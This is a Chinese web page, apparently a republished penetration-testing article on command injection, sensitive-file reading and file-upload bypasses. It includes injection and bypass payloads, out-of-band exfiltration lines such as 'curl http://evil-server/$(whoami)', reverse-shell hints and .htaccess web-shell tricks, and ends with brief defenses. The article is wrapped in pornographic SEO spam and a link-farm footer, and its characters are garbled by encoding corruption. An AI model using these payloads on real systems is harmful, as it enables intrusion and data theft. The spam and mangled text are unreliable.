少妇被粗黑进进出出在线观看_日日摸夜夜爽无码_免费久久_日韩免费视频_热播短剧玫瑰冠冕免费观看_japanese精品少妇

網(wǎng)站命令執(zhí)行滲透測(cè)試步驟詳情
  • 更新時(shí)間:2025-05-13 00:33:34
  • 開發(fā)經(jīng)驗(yàn)
  • 發(fā)布時(shí)間:3年前
  • 746

哈嘍大家好,近期我們Sine安全對(duì)客戶平臺(tái)進(jìn)行滲透測(cè)試的時(shí)候,發(fā)現(xiàn)有一些命令執(zhí)行的漏洞測(cè)試語(yǔ)句和函數(shù),導(dǎo)致服務(wù)器被提權(quán)被入侵,上一節(jié)提到XSS跨站腳本攻擊檢測(cè)方法,本章來(lái)總和一下腳本執(zhí)行命令的詳細(xì)檢測(cè)手段,以及繞過waf的辦法,只有這樣詳細(xì)的對(duì)平臺(tái)進(jìn)行安全測(cè)試才能保障整個(gè)平臺(tái)安全穩(wěn)定。


3.5.1. 簡(jiǎn)介

命令注入通常因?yàn)橹竁eb應(yīng)用在服務(wù)器上拼接系統(tǒng)命令而造成的漏洞。

該類漏洞通常出現(xiàn)在調(diào)用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主機(jī)名/IP/掩碼/網(wǎng)關(guān)、查看系統(tǒng)信息以及關(guān)閉重啟等功能,或者一些站點(diǎn)提供如ping、nslookup、提供發(fā)送郵件、轉(zhuǎn)換圖片等功能都可能出現(xiàn)該類漏洞。


3.5.2. 常見危險(xiǎn)函數(shù)

3.5.2.1. PHP

system

exec

passthru

shell_exec

popen

proc_open

3.5.2.2. Python

system

popen

subprocess.call

spawn

3.5.2.3. Java

java.lang.Runtime.getRuntime().exec(command)

3.5.3. 常見注入方式

分號(hào)分割

|| && & 分割

| 管道符

\r\n %d0%a0 換行

反引號(hào)解析

$() 替換

3.5.4. 無(wú)回顯技巧

bash反彈shell

DNS帶外數(shù)據(jù)

http帶外

curl http://evil-server/$(whoami)

wget http://evil-server/$(whoami)

無(wú)帶外時(shí)利用 sleep 或其他邏輯構(gòu)造布爾條件

3.5.5. 常見繞過方式

3.5.5.1. 空格繞過

< 符號(hào) cat<123

\t / %09

${IFS} 其中{}用來(lái)截?cái)啵热鏲at$IFS2會(huì)被認(rèn)為IFS2是變量名。另外,在后面加個(gè)$可以起到截?cái)嗟淖饔茫话阌?9,因?yàn)?9是當(dāng)前系統(tǒng)shell進(jìn)程的第九個(gè)參數(shù)的持有者,它始終為空字符串

3.5.5.2. 黑名單繞過

a=l;b=s;$a$b

echo "bHM=" | -d

/?in/?s => /bin/ls

連接符 cat /etc/pass'w'd

未定義的初始化變量 cat$x /etc/passwd

3.5.5.3. 長(zhǎng)度限制繞過

>wget\

>foo.\

>com

ls -t>a

sh a

上面的方法為通過命令行重定向?qū)懭朊睿又ㄟ^ls按時(shí)間排序把命令寫入文件,最后執(zhí)行 直接在Linux終端下執(zhí)行的話,創(chuàng)建文件需要在重定向符號(hào)之前添加命令 這里可以使用一些諸如w,[之類的短命令,(使用ls /usr/bin/?查看) 如果不添加命令,需要Ctrl+D才能結(jié)束,這樣就等于標(biāo)準(zhǔn)輸入流的重定向 而在php中 , 使用 shell_exec 等執(zhí)行系統(tǒng)命令的函數(shù)的時(shí)候 , 是不存在標(biāo)準(zhǔn)輸入流的,所以可以直接創(chuàng)建文件

3.5.6. 常用符號(hào)

3.5.6.1. 命令分隔符

%0a / %0d / \n / \r

;

& / &&

3.5.6.2. 通配符

* 0到無(wú)窮個(gè)任意字符

? 一個(gè)任意字符

[ ] 一個(gè)在括號(hào)內(nèi)的字符,e.g. [abcd]

[ - ] 在編碼順序內(nèi)的所有字符

[^ ] 一個(gè)不在括號(hào)內(nèi)的字符

3.5.7. 防御

不使用時(shí)禁用相應(yīng)函數(shù)

盡量不要執(zhí)行外部的應(yīng)用程序或命令

做輸入的格式檢查

轉(zhuǎn)義命令中的所有shell元字符

shell元字符包括 #&;`,|*?~<>^()[]{}$\

3.6. 文件讀取

3.6. 文件讀取

考慮讀取可能有敏感信息的文件

用戶目錄下的敏感文件

.bash_history

.zsh_history

.profile

.bashrc

.gitconfig

.viminfo

passwd

應(yīng)用的配置文件

/etc/apache2/apache2.conf

/etc/nginx/nginx.conf

應(yīng)用的日志文件

/var/log/apache2/access.log

/var/log/nginx/access.log

站點(diǎn)目錄下的敏感文件

.svn/entries

.git/HEAD

WEB-INF/web.xml

.htaccess

特殊的備份文件

.swp

.swo

.bak

index.php~

Python的Cache

__pycache__\__init__.cpython-35.pyc

3.7. 文件上傳

3.7.1. 文件類型檢測(cè)繞過

3.7.1.1. 更改請(qǐng)求繞過

有的站點(diǎn)僅僅在前端檢測(cè)了文件類型,這種類型的檢測(cè)可以直接修改網(wǎng)絡(luò)請(qǐng)求繞過。同樣的,有的站點(diǎn)在后端僅檢查了HTTP Header中的信息,比如 Content-Type 等,這種檢查同樣可以通過修改網(wǎng)絡(luò)請(qǐng)求繞過。


3.7.1.2. Magic檢測(cè)繞過

有的站點(diǎn)使用文件頭來(lái)檢測(cè)文件類型,這種檢查可以在Shell前加入對(duì)應(yīng)的字節(jié)以繞過檢查。幾種常見的文件類型的頭字節(jié)如下表所示


3.7.1.3. 后綴繞過

部分服務(wù)僅根據(jù)后綴、上傳時(shí)的信息或Magic Header來(lái)判斷文件類型,此時(shí)可以繞過。

php由于歷史原因,部分解釋器可能支持符合正則 /ph(p[2-7]?|t(ml)?)/ 的后綴,如 php / php5 / pht / phtml / shtml / pwml / phtm 等 可在禁止上傳php文件時(shí)測(cè)試該類型。

jsp引擎則可能會(huì)解析 jspx / jspf / jspa / jsw / jsv / jtml 等后綴,asp支持 asa / asax / cer / cdx / aspx / ascx / ashx / asmx / asp{80-90} 等后綴。

除了這些繞過,其他的后綴同樣可能帶來(lái)問題,如 vbs / asis / sh / reg / cgi / exe / dll / com / bat / pl / cfc / cfm / ini 等。


3.7.1.4. 系統(tǒng)命名繞過

在Windows系統(tǒng)中,上傳 index.php. 會(huì)重命名為 . ,可以繞過后綴檢查。也可嘗試

index.php%20, index.php:1.jpg index.php::$DATA 等。在Linux系統(tǒng)中,可以嘗試上傳名為 index.php/. 或 ./aa/../index.php/. 的文件


3.7.1.5. .user.ini

在php執(zhí)行的過程中,除了主 php.ini 之外,PHP 還會(huì)在每個(gè)目錄下掃描 INI 文件,從被執(zhí)行的 PHP 文件所在目錄開始一直上升到 web 根目錄($_SERVER[‘DOCUMENT_ROOT’] 所指定的)。如果被執(zhí)行的 PHP 文件在 web 根目錄之外,則只掃描該目錄。.user.ini 中可以定義除了PHP_INI_SYSTEM以外的模式的選項(xiàng),故可以使用 .user.ini 加上非php后綴的文件構(gòu)造一個(gè)shell,比如 auto_prepend_file=01.gif 。


3.7.1.6. WAF繞過

有的waf在編寫過程中考慮到性能原因,只處理一部分?jǐn)?shù)據(jù),這時(shí)可以通過加入大量垃圾數(shù)據(jù)來(lái)繞過其處理函數(shù)。

另外,Waf和Web系統(tǒng)對(duì) boundary 的處理不一致,可以使用錯(cuò)誤的 boundary 來(lái)完成繞過。


3.7.1.7. 競(jìng)爭(zhēng)上傳繞過

有的服務(wù)器采用了先保存,再刪除不合法文件的方式,在這種服務(wù)器中,可以反復(fù)上傳一個(gè)會(huì)生成Web Shell的文件并嘗試訪問,多次之后即可獲得Shell。


3.7.2. 攻擊技巧

3.7.2.1. Apache重寫GetShell

Apache可根據(jù)是否允許重定向考慮上傳.htaccess

內(nèi)容為

AddType application/x-httpd-php .png php_flag engine 1

就可以用png或者其他后綴的文件做php腳本了


3.7.2.2. 軟鏈接任意讀文件

上傳的壓縮包文件會(huì)被解壓的文件時(shí),可以考慮上傳含符號(hào)鏈接的文件 若服務(wù)器沒有做好防護(hù),可實(shí)現(xiàn)任意文件讀取的效果,如果覺得防護(hù)做的不到位 不放心的話,可以找專業(yè)的網(wǎng)站安全公司來(lái)處理解決,畢竟術(shù)業(yè)有專攻,國(guó)內(nèi)做的比較好的公司如:Sinesafe,綠盟,啟明星辰等等。


3.7.3. 防護(hù)技巧

使用白名單限制上傳文件的類型

使用更嚴(yán)格的文件類型檢查方式

限制Web Server對(duì)上傳文件夾的解析

我們專注高端建站,小程序開發(fā)、軟件系統(tǒng)定制開發(fā)、BUG修復(fù)、物聯(lián)網(wǎng)開發(fā)、各類API接口對(duì)接開發(fā)等。十余年開發(fā)經(jīng)驗(yàn),每一個(gè)項(xiàng)目承諾做到滿意為止,多一次對(duì)比,一定讓您多一份收獲!

本文章出于推來(lái)客官網(wǎng),轉(zhuǎn)載請(qǐng)表明原文地址:https://www.tlkjt.com/experience/7583.html
推薦文章

在線客服

掃碼聯(lián)系客服

3985758

回到頂部

主站蜘蛛池模板: 亚洲国产精品综合_www久久只有这里有精品_日韩av不卡一区_欧美成人片一区二区三区_www日韩欧美_线观看免费完整aaa | 福利片一区二区_国产精品国内自产_亚洲一区二区三区观看_8x8x精品国产一区_亚洲精品国产最新在线不卡_性迷宫在线看 | 一区视频在线_同性男男无遮挡无码视频_欧洲一级免费_久久成人18免费观看_porono国产_黑人40cm性做爰免费视频 | 乌克兰少妇videos高潮_国产女人18毛片水真多18精品_日日躁狠狠躁狠狠爱_男人的天堂免费网站_免费又黄又爽又色的视频_日日日操操 | 免费看成一片_欧美久久天天综合香蕉伊_精品国产久九九_亚洲a∨无码一区二区_欧美精品一区二区三区很污很色的_久久久国产精品福利片 | 久久五月丁香中文字幕_日本伦理一区二区_台湾成人在线_91视频在线播放视频_男插女视频免费观看_午夜欧美激情三级亚洲美女操 | 五月天男人天堂_国产在线无码制服丝袜无码_日韩精彩视频_日本乱大交xxxx公交车_国产区精品区_va亚洲va欧美va国产综合 | 人人爽人人爽人人片_免费在线色视频_亚洲日产中文字幕无码_最新黄网在线观看_中文字幕线观看_国色精品无码专区在线不卡 | 爱爱插入视频_精品福利视频一区_三个男吃我奶头一边一个视频_亚洲欧洲日本在线_国产精品无码专区_国产成人免费a在线视频色戒 | free性ⅴideo另类重口_黄色毛片免费视频_麻豆精品二区_果冻tv在线免费观看_日韩精品人妻无码久久影院_丰满人妻妇伦又伦精品国产 | 成人h在线观看_黄色片免费看看_九九日韩_亚洲毛片在线_国产精品高潮呻吟AV久久无吗_日韩精品一区二区三区久久 | 女人被添全过程a片免费视频_99精品国产高清_亚洲一区二区在线免费_免费看片亚洲_亚洲日韩成人无码_美女毛片在线观看 | 老色鬼永久视频网站_一本一道免费在线_色婷婷亚洲六月婷婷中文字幕_久久青草欧美一区二区三区_男女猛烈激情XX00免费视频_日本理论一二三四高清 | 国内外一级毛片_av橹橹_成熟人妻AV无码专区_国产一国产二_日本精品aaa_国产无遮挡又黄又爽的视频 | 日本在线精品视频_中文字幕久久一区二区三区_国产特黄A片AAAA毛片_一二三区免费_噜噜噜亚洲色成人网站_亚洲免费国产视频 | aaaa日韩_精品三级毛片_videos日本熟妇人妻_免费在线一级毛片_久久精品www_国语自产一区第二页欧美 | 在线观看黄色av_8x成人66m免费视频_特一级毛片_www.黄色小视频_特级黄色影院_秋霞毛片久久久久久久久 | 手机免费一级片_欧美性猛_石原莉奈一区二区在线播放_www.婷婷.com_日韩成人免费中文字幕_亚洲wwwwwww | 精品国产乱码久久久久_久久免费看少妇高潮V片特黄_丰满熟女人妻中文字幕免费_亚洲成AV人片在WWW色猫咪_刘亦菲毛片一区二区三区_人成午夜免费大片 | 亚洲AV永久中文无码精品_视频一区精品_欧美一级高清在线_国产一级a一级a爰片免费无_午夜欧美日韩精品久久久久久_国产精品91色 | 亚洲爆乳大丰满无码专区_在线播放国产一区中文字幕剧情欧美_91在线欧美_毛片真人毛毛片毛片_国内精品久久久久影院中文字幕_天天爱天天舔 | 玩弄少妇高潮ⅹxxxyw_国产精品无码无片在线观看3D_av网站在线播放_樱花草视频WWW_妖精视频亚洲欧美日韩美女_欧美综合在线观看 | 97久久精品无码一区二区_久久丫亚洲一区二区_99久久一区二区_日本中文字幕在线观看全_亚洲成色综合网站yy_爱爱爱视频免费看 | 国产日韩在线看片_亚洲一区二区中文_欧美乱人伦中文字幕在线_99精品欧美_久久午夜综合久久_天天骑天天射 | 久久精品日韩精品_中文无码亚洲精品制服丝袜_国产成人高清精品_樱桃视频大全免费高清版_无码AV天天AV天天爽_国产内射性高潮对白 久久成人高清_人人射视频_性av一区_欧洲人免费视频网站在线_欧美亚洲精品一区二区_亚洲欧美视频图片 | 日日夜夜精彩视频_九九精品国产亚洲AV日韩_男人日女人视频软件_欧美成人视屏_亚洲激情首页_欧美亚洲色综久久精品国产 | 在线观看免费国产视频_国产伦精品一区二区三区视频新_丰满熟女高潮毛茸茸欧洲视频_精品人妻无码一区二区三区四区无码_国产美女裸体免无遮挡免费网站_欧美成人一级 | 亚洲a视_免费夜里18款禁用b站软粉色_91精品国自产在线观看欧美_高清av一区二区_亚洲妇女体内精汇编_欧洲黄色一级视频 | 男人女人努力生猴子_精品国产乱码一区二区三区四区_中文字幕在线一_国产精品免费观看久久_国产黄色大片网站_在线免费av片 | 日日夜夜人人_大地影视中文第二页的背景故事_成人福利_久草成人在线视频_免费草比视频_韩国毛片免费观看 | 人妻少妇乱子伦喷水_在线一区二区三区做爰视频网站_十六以下岁女子毛片免费_国产精品jvid辛尤里在线观看_久久极品_欧美精品免费看 | 久久精品中文字幕一区_69视频播放_gogogo高清在线观看中国_在线二区三区_高清重口变态sm在线观看_91免费观看视频 | 在线四区_自拍偷拍臀av_日韩高清免费看_欧美精品VIDEOFREE1080P_97久久综合一区二区三区_亚洲日韩欧美一区二区三区在线 | 婷婷激情四射_欧美视频免费在线观看_欧美视频黄_黑人巨大精品欧美一区二区一视频_国产在线精品国偷产拍_欧美国产亚洲日韩在线二区 | 9久热久爱免费精品视频在线_中日韩免费毛片_91小视频在线播放_国产精品一v二v在线观看_911国产影院在线观看_日本精品中文字幕在线播放 | 亚洲久久_国产一区二区三区四区老人_噜噜久久噜噜久久鬼88_一个人免费视频观看在线www_日韩一卡2卡3卡4卡新区亚洲_国产精品久久久久久久久丝袜 | 奇米影视在线_中出视频在线_国产肥老妇_欧美性视频一区二区三区_国产免费久久精品国产传媒_亚洲综合网站 | 少妇人妻无码AV片在线蜜芽_人妻丰满熟妇AV无码处处不卡_成年男女免费视频网站很黄的_99久久免费精品_无码人妻一区二区三区兔费_一本色道久久综合无码人妻 无遮挡A级毛片免费看_国产精品综合久久_不卡中文字幕_国产又粗又猛又爽又黄A片小说_国产黄色免费大片_日韩精人妻无码一区二区三区 | 日韩av一区二区三区在线_无码专区一ⅴa亚洲v专区在线_蜜芽国内精品视频在线观看_美女又爽又黄免费视频_jizz超清_国产精选免费进入 | 蜜桃视频一区二区三区在线观看_CHINESE青年大学生GAY18_美日韩成人_国产精品日韩欧美一区二区三区_久久综合五月丁香六月丁香_黄色片子一级 | 亚洲肥熟_真实国产熟睡乱子伦视频_蜜桃AV麻豆AV果冻传媒_夜夜操夜夜操_欧美成人性之站_欧美日韩国产激情 |